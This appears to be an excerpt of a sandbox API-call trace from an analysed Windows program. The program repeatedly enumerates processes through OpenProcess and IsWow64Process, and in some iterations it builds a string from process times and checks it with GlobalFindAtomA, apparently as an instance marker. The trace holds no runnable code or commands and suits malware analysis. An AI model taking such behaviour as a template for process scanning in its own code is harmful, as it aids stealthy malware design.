	[0116.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.905] CloseHandle (hObject=0x698) returned 1
	[0116.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.905] CloseHandle (hObject=0x698) returned 1
	[0116.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.905] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.906] CloseHandle (hObject=0x698) returned 1
	[0116.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.906] CloseHandle (hObject=0x698) returned 1
	[0116.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.906] CloseHandle (hObject=0x698) returned 1
	[0116.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.906] CloseHandle (hObject=0x698) returned 1
	[0116.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.906] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.906] CloseHandle (hObject=0x698) returned 1
	[0116.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.907] CloseHandle (hObject=0x698) returned 1
	[0116.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.907] CloseHandle (hObject=0x698) returned 1
	[0116.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.907] CloseHandle (hObject=0x698) returned 1
	[0116.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.907] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.907] CloseHandle (hObject=0x698) returned 1
	[0116.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.908] CloseHandle (hObject=0x698) returned 1
	[0116.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.908] CloseHandle (hObject=0x698) returned 1
	[0116.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.908] CloseHandle (hObject=0x698) returned 1
	[0116.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.908] CloseHandle (hObject=0x698) returned 1
	[0116.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.908] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.909] CloseHandle (hObject=0x698) returned 1
	[0116.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.909] CloseHandle (hObject=0x698) returned 1
	[0116.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.909] CloseHandle (hObject=0x698) returned 1
	[0116.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.909] CloseHandle (hObject=0x698) returned 1
	[0116.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.909] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.909] CloseHandle (hObject=0x698) returned 1
	[0116.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.910] CloseHandle (hObject=0x698) returned 1
	[0116.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.910] CloseHandle (hObject=0x698) returned 1
	[0116.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.910] CloseHandle (hObject=0x698) returned 1
	[0116.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.910] CloseHandle (hObject=0x698) returned 1
	[0116.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.910] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.910] CloseHandle (hObject=0x698) returned 1
	[0116.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.911] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.911] CloseHandle (hObject=0x698) returned 1
	[0116.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.911] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.911] CloseHandle (hObject=0x698) returned 1
	[0116.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.911] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.911] CloseHandle (hObject=0x698) returned 1
	[0116.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.911] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.911] CloseHandle (hObject=0x698) returned 1
	[0116.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.912] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.912] CloseHandle (hObject=0x698) returned 1
	[0116.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.912] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.912] CloseHandle (hObject=0x698) returned 1
	[0116.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.913] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.913] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.913] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.913] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.913] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.913] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.914] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.914] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.914] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.914] CloseHandle (hObject=0x698) returned 1
	[0116.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.914] CloseHandle (hObject=0x698) returned 1
	[0116.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.914] CloseHandle (hObject=0x698) returned 1
	[0116.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.914] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.914] CloseHandle (hObject=0x698) returned 1
	[0116.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.949] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.949] CloseHandle (hObject=0x698) returned 1
	[0116.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.950] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.950] CloseHandle (hObject=0x698) returned 1
	[0116.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.950] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.950] CloseHandle (hObject=0x698) returned 1
	[0116.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.950] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.950] CloseHandle (hObject=0x698) returned 1
	[0116.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.951] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.951] CloseHandle (hObject=0x698) returned 1
	[0116.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.951] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.951] CloseHandle (hObject=0x698) returned 1
	[0116.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.951] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.951] CloseHandle (hObject=0x698) returned 1
	[0116.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.952] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.952] CloseHandle (hObject=0x698) returned 1
	[0116.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.952] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.952] CloseHandle (hObject=0x698) returned 1
	[0116.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.952] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.952] CloseHandle (hObject=0x698) returned 1
	[0116.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.952] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.952] CloseHandle (hObject=0x698) returned 1
	[0116.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.952] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.953] CloseHandle (hObject=0x698) returned 1
	[0116.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.953] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.953] CloseHandle (hObject=0x698) returned 1
	[0116.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.953] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.953] CloseHandle (hObject=0x698) returned 1
	[0116.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.953] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.953] CloseHandle (hObject=0x698) returned 1
	[0116.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.953] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.953] CloseHandle (hObject=0x698) returned 1
	[0116.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.954] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.954] CloseHandle (hObject=0x698) returned 1
	[0116.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.954] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.954] CloseHandle (hObject=0x698) returned 1
	[0116.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.954] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.954] CloseHandle (hObject=0x698) returned 1
	[0116.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.954] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.954] CloseHandle (hObject=0x698) returned 1
	[0116.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.954] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.954] CloseHandle (hObject=0x698) returned 1
	[0116.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.955] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.955] CloseHandle (hObject=0x698) returned 1
	[0116.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.955] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.955] CloseHandle (hObject=0x698) returned 1
	[0116.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.955] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.955] CloseHandle (hObject=0x698) returned 1
	[0116.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.955] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.955] CloseHandle (hObject=0x698) returned 1
	[0116.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.956] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.956] CloseHandle (hObject=0x698) returned 1
	[0116.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.956] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.956] CloseHandle (hObject=0x698) returned 1
	[0116.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.956] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.956] CloseHandle (hObject=0x698) returned 1
	[0116.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.956] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.956] CloseHandle (hObject=0x698) returned 1
	[0116.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.956] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.956] CloseHandle (hObject=0x698) returned 1
	[0116.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.957] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.957] CloseHandle (hObject=0x698) returned 1
	[0116.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.957] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.957] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.957] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.957] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.958] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.958] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.958] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.958] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.958] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.958] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.958] CloseHandle (hObject=0x698) returned 1
	[0116.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.959] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.959] CloseHandle (hObject=0x698) returned 1
	[0116.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.959] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.959] CloseHandle (hObject=0x698) returned 1
	[0116.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.959] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.959] CloseHandle (hObject=0x698) returned 1
	[0116.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.002] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.002] CloseHandle (hObject=0x698) returned 1
	[0117.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.003] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.003] CloseHandle (hObject=0x698) returned 1
	[0117.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.003] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.003] CloseHandle (hObject=0x698) returned 1
	[0117.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.003] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.003] CloseHandle (hObject=0x698) returned 1
	[0117.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.004] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.004] CloseHandle (hObject=0x698) returned 1
	[0117.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.004] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.004] CloseHandle (hObject=0x698) returned 1
